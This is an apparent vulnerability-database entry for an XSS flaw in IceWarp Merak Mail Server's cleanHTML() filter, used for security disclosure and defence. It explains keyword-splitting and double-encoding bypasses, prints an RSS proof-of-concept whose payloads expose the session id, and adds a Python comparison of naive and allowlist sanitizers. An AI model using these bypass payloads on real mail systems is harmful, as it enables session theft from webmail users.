IceWarp Merak Mail Server cleanHTML() Function Cross-Site Scripting Vulnerability

Vulnerability ID: 1117705
Vulnerability type: Cross-site scripting
Published: 2009-05-05
Updated: 2009-05-06
CVE ID: CVE-2009-1467
CNNVD-ID: CNNVD-200905-049
Platform: PHP
CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/32985
https://www.securityfocus.com/bid/34823
https://cxsecurity.com/issue/WLB-2009050109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-049
|Vulnerability details
Merak Email Server is a comprehensive mail solution for office LAN or Internet communication. To prevent JavaScript and VBScript from executing in HTML mail and to filter out unwanted HTML tags, the cleanHTML() function of the Merak Mail Server WebMail module filters every HTML message.

In lines 462 to 482, cleanHTML() deletes or rewrites various dangerous keywords: it removes every attribute whose name begins with "on" (onmouseover, onload, and so on) and rewrites javascript and vbscript to noscript. Afterwards, at line 485, cleanHTML() strips a set of HTML tags from the message outright: $string=preg_replace('frame|frameset|ilayer|layer|bgsound)[^>]*>#i',"",$string); If one of these tags is injected into the middle of a keyword that the earlier steps filter, cleanHTML() does not recognise the keyword, and once the function later removes the tag the two halves rejoin and the keyword becomes effective again.

A second way to bypass the filter is to use hexadecimal HTML entities. cleanHTML() decodes the input string exactly once, at line 459: $string=html_entity_decode($string,ENT_COMPAT,"UTF-8"); When the input is double-encoded, none of the regular expressions used for filtering can recognise the malicious content after that single decode.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/34825/info

IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting</title>
    <link
      href="http://www.example.come"
      rel="self"
      type="application/rss+xml" />
    <link>http://www.example.come</link>
    <description>Seeing your network from the attacker's perspective</description>
    <pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
    <language>de</language>
    <item>
      <title><script>alert('Title: Your session id is: ' +
window.top.sSID);</script></title>
      <link>http://www.example.come/pentest</link>
      <pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
      <description>
        <div o<xml>nmouseover="alert('Description: Your session id is: ' +
window.top.sSID)">
          RedTeam Pentesting XSS
        </div>
      </description>
    </item>
  </channel>
</rss>
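Added example, not code from the advisory or from IceWarp: a Python sketch of why the strip-and-rewrite approach described in the details section fails against the inputs shown in the proof-of-concept above, next to an allowlist sanitizer that rebuilds output from parsed tokens. naive_clean_html() is a constructed approximation of the described pipeline (one entity decode, on* attribute removal, javascript/vbscript rewrite, tag stripping); its tag list is an assumption, because the page shows the preg_replace pattern only partially, and xml is included because the published payload depends on <xml> being removed. AllowlistSanitizer, sanitize(), safe_href() and second_decode() are names chosen for this example; the split-attribute and title-script inputs are taken from the proof-of-concept above, and the double-encoded script tag is constructed.

```python
"""Added example: strip-based HTML filtering versus an allowlist sanitizer.

naive_clean_html() is a constructed approximation of the pipeline the advisory
describes, not IceWarp's code. The other names are this example's own.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the page shows the preg_replace pattern only partially; "xml" is
# added because the published payload depends on <xml> being stripped.
STRIPPED_TAGS = r"frame|frameset|ilayer|layer|bgsound|xml"


def naive_clean_html(string: str) -> str:
    """Decode once, strip on* attributes, rewrite script keywords, strip tags.

    Each step rewrites the string, so text that looked harmless when one step
    ran can become dangerous after a later step removes something in the middle.
    """
    string = html.unescape(string)  # one decode pass, like html_entity_decode
    string = re.sub(r'\bon\w+\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)', "",
                    string, flags=re.I)  # remove onmouseover=..., onload=...
    string = re.sub(r"javascript|vbscript", "noscript", string, flags=re.I)
    string = re.sub(rf"<\s*/?\s*(?:{STRIPPED_TAGS})[^>]*>", "",
                    string, flags=re.I)  # strip unwanted tags last
    return string


ALLOWED_TAGS = {"a", "b", "br", "div", "em", "i", "p", "span", "strong"}
ALLOWED_ATTRS = {"a": {"href"}}  # everything else (on*, style, ...) is dropped
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" means a relative URL


def safe_href(value: str) -> bool:
    """Reject javascript:, vbscript:, data: and unparsable URLs."""
    try:
        return urlsplit(value).scheme in SAFE_SCHEMES
    except ValueError:
        return False


class AllowlistSanitizer(HTMLParser):
    """Rebuild the fragment from parsed tokens instead of editing the string.

    Entities are decoded exactly once (by the parser), unknown tags and
    attributes are dropped, and text is re-escaped on output, so the markup
    the filter judged is the markup the browser will parse.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.open: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # <script>, <xml>, <iframe>, ... vanish with their attributes
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # also drops a split name such as o<xml
            if name == "href" and not safe_href(value or ""):
                continue
            parts.append(f'{name}="{html.escape(value or "", quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open:  # close only elements we actually emitted
            while self.open:
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))  # text stays text

    def result(self) -> str:
        self.close()
        while self.open:
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()


def second_decode(string: str) -> str:
    """What any later entity decode (or a lenient consumer) would see."""
    return html.unescape(string)


# Inputs from the proof-of-concept above (split attribute name, title script)
# plus a constructed double-encoded script tag.
SPLIT_PAYLOAD = ('<div o<xml>nmouseover="alert(\'Description: Your session id is: \' + '
                 'window.top.sSID)">RedTeam Pentesting XSS</div>')
SCRIPT_PAYLOAD = "<script>alert('Title: Your session id is: ' + window.top.sSID);</script>"
DOUBLE_PAYLOAD = "&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;"

if __name__ == "__main__":
    for label, payload in [("split", SPLIT_PAYLOAD), ("script", SCRIPT_PAYLOAD),
                           ("double", DOUBLE_PAYLOAD)]:
        print(label, "naive    :", naive_clean_html(payload))
        print(label, "allowlist:", sanitize(payload))
```

Running the script shows the split payload coming out of naive_clean_html() with a live onmouseover attribute once <xml> is removed, while the allowlist sanitizer drops the unknown attribute and escapes the leftover text. The double-encoded input is the instructive case: the naive pipeline leaves &lt;script&gt; in its output, which turns into a real tag at the next decode, whereas the sanitizer decodes once inside the parser and re-escapes on output, so a second decode still yields text. The design point is that the fix is not a longer regex but a parse, an allowlist, and re-serialisation.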
|Affected products
IceWarp Merak Mail Server 9.4.1
|References

Source: MISC
Link: http://www.redteam-pentesting.de/advisories/rt-sa-2009-002
Source: XF
Name: merak-webmail-xss(50331)
Link: http://xforce.iss.net/xforce/xfdb/50331
Source: VUPEN
Name: ADV-2009-1253
Link: http://www.vupen.com/english/advisories/2009/1253
Source: SECTRACK
Name: 1022168
Link: http://www.securitytracker.com/id?1022168
Source: SECTRACK
Name: 1022167
Link: http://www.securitytracker.com/id?1022167
Source: BID
Name: 34825
Link: http://www.securityfocus.com/bid/34825
Source: BUGTRAQ
Name: 20090505 [RT-SA-2009-002] IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader
Link: http://www.securityfocus.com/archive/1/archive/1/503229/100/0/threaded
Source: BUGTRAQ
Name: 20090505 [RT-SA-2009-001] IceWarp WebMail Server: Cross Site Scripting in Email View
Link: http://www.securityfocus.com/archive/1/archive/1/503225/100/0/threaded
Source: MISC
Link: http://www.redteam-pentesting.de/advisories/rt-sa-2009-001
Source: OSVDB
Name: 54227
Link: http://osvdb.org/54227
Source: OSVDB
Name: 54226
Link: http://osvdb.org/54226